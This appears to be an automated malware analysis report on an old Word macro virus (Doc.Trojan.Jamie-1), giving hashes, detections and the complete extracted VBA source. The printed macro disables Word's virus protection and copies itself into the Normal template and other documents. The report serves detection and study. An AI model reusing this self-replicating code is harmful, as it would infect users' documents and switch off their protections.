Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23a57ec74da3d231…

MALICIOUS

Office (OLE)

35.5 KB Created: 1999-05-21 20:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d381485eaad6f67db573f89992498f9c SHA-1: 25ac6b603892a9e8a0e4714364345f5ca07378b9 SHA-256: 23a57ec74da3d231ddfdaf7cc26e23cf1c107e8b85edb7cc2f9c61af48756f06
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document containing VBA macros, specifically a Document_Open macro. The macro attempts to export its code to 'Jamie.tmp', then import it into the Normal.dot template, and finally overwrite the current document's code. This behavior suggests an attempt to modify document templates or embed malicious code for persistence or propagation. The ClamAV detection 'Doc.Trojan.Jamie-1' and the macro's comments indicate it is a known piece of malware from 1999.

Heuristics 3

  • ClamAV: Doc.Trojan.Jamie-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jamie-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1557 bytes
SHA-256: 1c908a05a3a172a9465215de6f16861f073800f338809f5b5898622426ad0371
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If ActiveDocument.VBProject.Description <> "For Jamie..." Then GoTo ADI
If NormalTemplate.VBProject.Description <> "For Jamie..." Then GoTo NTI
End
ADI:
Set MTI = AD
Set MTC = NT
OPM = "Private Sub Document_Close()"
AII = AD.CodeModule.CountOfLines
ActiveDocument.VBProject.Description = "For Jamie..."
GoTo Install
NTI:
Set MTI = NT
Set MTC = AD
OPM = "Private Sub Document_Open()"
AII = NT.CodeModule.CountOfLines
NormalTemplate.VBProject.Description = "For Jamie..."
GoTo Install
Install:
If AII > 0 Then
 With MTI.CodeModule
  For x = x To AII
  .DeleteLines 1
  Next
 End With
End If
If AII >= 0 Then
 MTC.Export ("Jamie.tmp")
 MTI.CodeModule.AddFromFile ("Jamie.tmp")
  With MTI.CodeModule
   For x = x To 3
   .DeleteLines 1
   Next
   .ReplaceLine 1, OPM
  End With
 Kill ("Jamie.tmp")
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
',.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,
' Jamie(Type A - Strand A) By Lys KovicK
' Released: Friday, May 21, 1999, 15:40
'';';';';';';';';';';';';';';';';';';';';'